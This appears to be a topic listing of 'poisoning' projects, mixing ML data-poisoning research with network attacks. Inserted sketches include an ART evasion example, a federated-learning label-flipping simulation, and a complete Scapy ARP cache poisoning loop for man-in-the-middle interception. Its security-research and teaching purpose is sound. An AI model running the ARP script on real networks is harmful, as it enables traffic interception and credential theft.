poisoning
Adversarial Robustness Toolbox (ART) - Python Library for Machine Learning Security - Evasion, Poisoning, Extraction, Inference - Red and Blue Teams
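As a rough illustration of how ART is typically driven (not code from the repository itself), the sketch below wraps a scikit-learn classifier and runs ART's FastGradientMethod evasion attack; the dataset, hyperparameters, and epsilon are placeholders, and ART's poisoning, extraction, and inference attacks follow an analogous estimator/attack interface under `art.attacks`.

```python
# Minimal ART sketch (assumes ART and scikit-learn are installed; values are illustrative).
import numpy as np
from sklearn.datasets import load_iris
from sklearn.linear_model import LogisticRegression
from art.estimators.classification import SklearnClassifier
from art.attacks.evasion import FastGradientMethod

x, y = load_iris(return_X_y=True)
model = LogisticRegression(max_iter=1000).fit(x, y)

# Wrap the fitted model so ART attacks can query its predictions and gradients.
classifier = SklearnClassifier(model=model)

# Craft adversarial (evasion) examples with the Fast Gradient Method.
attack = FastGradientMethod(estimator=classifier, eps=0.5)
x_adv = attack.generate(x=x.astype(np.float32))

clean_acc = np.mean(model.predict(x) == y)
adv_acc = np.mean(model.predict(x_adv) == y)
print(f"accuracy clean: {clean_acc:.3f}  adversarial: {adv_acc:.3f}")
```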
A curated list of trustworthy deep learning papers. Updated daily.
Stealing Wi-Fi passwords via browser cache poisoning.
Contact: Maximilian Bachl, Alexander Hartl. Explores defenses against backdoor and poisoning attacks on intrusion detection systems. Code for "EagerNet" is in the "eager" branch.
A man-in-the-middle (MITM) ARP cache poisoner implemented with Scapy, together with an HTTP sniffer.
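Not taken from this repository, but a minimal sketch of the technique it implements: ARP cache poisoning with Scapy's standard primitives (ARP, Ether, srp, send). The IP addresses and pacing are hypothetical, and this should only be run against a lab network you own.

```python
# Minimal ARP cache poisoning sketch with Scapy (requires root; lab use only).
from scapy.all import ARP, Ether, srp, send
import time

def get_mac(ip):
    """Resolve a MAC address by broadcasting an ARP who-has request."""
    ans, _ = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip), timeout=2, verbose=False)
    return ans[0][1].hwsrc if ans else None

def poison(target_ip, spoof_ip):
    """Send an ARP reply (op=2) telling target_ip that spoof_ip is at our MAC."""
    target_mac = get_mac(target_ip)
    send(ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip), verbose=False)

if __name__ == "__main__":
    target_ip, gateway_ip = "192.168.1.10", "192.168.1.1"   # hypothetical lab addresses
    while True:
        poison(target_ip, gateway_ip)   # victim now maps the gateway IP to our MAC
        poison(gateway_ip, target_ip)   # gateway now maps the victim IP to our MAC
        time.sleep(2)                   # re-poison periodically so the cache stays stale
```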
Prediction of naloxone dose in opioid toxicity using machine learning techniques.
Simulation of federated learning (FL) in Python for a digit-recognition ML model; simulates poisoning attacks and studies their impact.
This study explores the vulnerability of a federated learning (FL) model in which a portion of the clients participating in the FL process is controlled by adversaries who have no access to the training data but can access the training model and its parameters.
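The two federated-learning entries above both simulate poisoning in FL. As a rough, self-contained illustration (not code from either repository), the sketch below runs federated averaging on synthetic data with a label-flipping data-poisoning attack mounted by a subset of clients; the model, data, and constants are placeholders.

```python
# Minimal FedAvg + label-flipping poisoning sketch on a toy logistic-regression task.
import numpy as np

rng = np.random.default_rng(0)
NUM_CLIENTS, MALICIOUS, ROUNDS, DIM = 10, 3, 50, 20

# Synthetic binary-classification data, split across clients.
w_true = rng.normal(size=DIM)
def make_client(n=200):
    x = rng.normal(size=(n, DIM))
    y = (x @ w_true > 0).astype(float)
    return x, y

clients = [make_client() for _ in range(NUM_CLIENTS)]
# Malicious clients flip their labels before local training (data poisoning).
for i in range(MALICIOUS):
    x, y = clients[i]
    clients[i] = (x, 1.0 - y)

def local_update(w, x, y, lr=0.1, epochs=5):
    """A few steps of logistic-regression gradient descent on one client's data."""
    for _ in range(epochs):
        p = 1.0 / (1.0 + np.exp(-(x @ w)))
        w = w - lr * x.T @ (p - y) / len(y)
    return w

w_global = np.zeros(DIM)
x_test, y_test = make_client(1000)
for _ in range(ROUNDS):
    # Each client trains locally; the server averages the returned weights (FedAvg).
    local_ws = [local_update(w_global.copy(), x, y) for x, y in clients]
    w_global = np.mean(local_ws, axis=0)

acc = np.mean(((x_test @ w_global) > 0).astype(float) == y_test)
print(f"Test accuracy with {MALICIOUS}/{NUM_CLIENTS} poisoned clients: {acc:.3f}")
```

Varying MALICIOUS (e.g. 0 versus 3) shows how the averaged global model degrades as the fraction of poisoned clients grows.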
M. Anisetti, C. A. Ardagna, A. Balestrucci, N. Bena, E. Damiani, C. Y. Yeun, "On the Robustness of Random Forest Against Data Poisoning: An Ensemble-Based Approach," IEEE Transactions on Sustainable Computing (TSUSC), vol. 8, no. 4.
This is a project by Lane Affield, Emma Gerdeman, and Munachi Okuagu to showcase what we have learned through Drake University's Artificial Intelligence Program.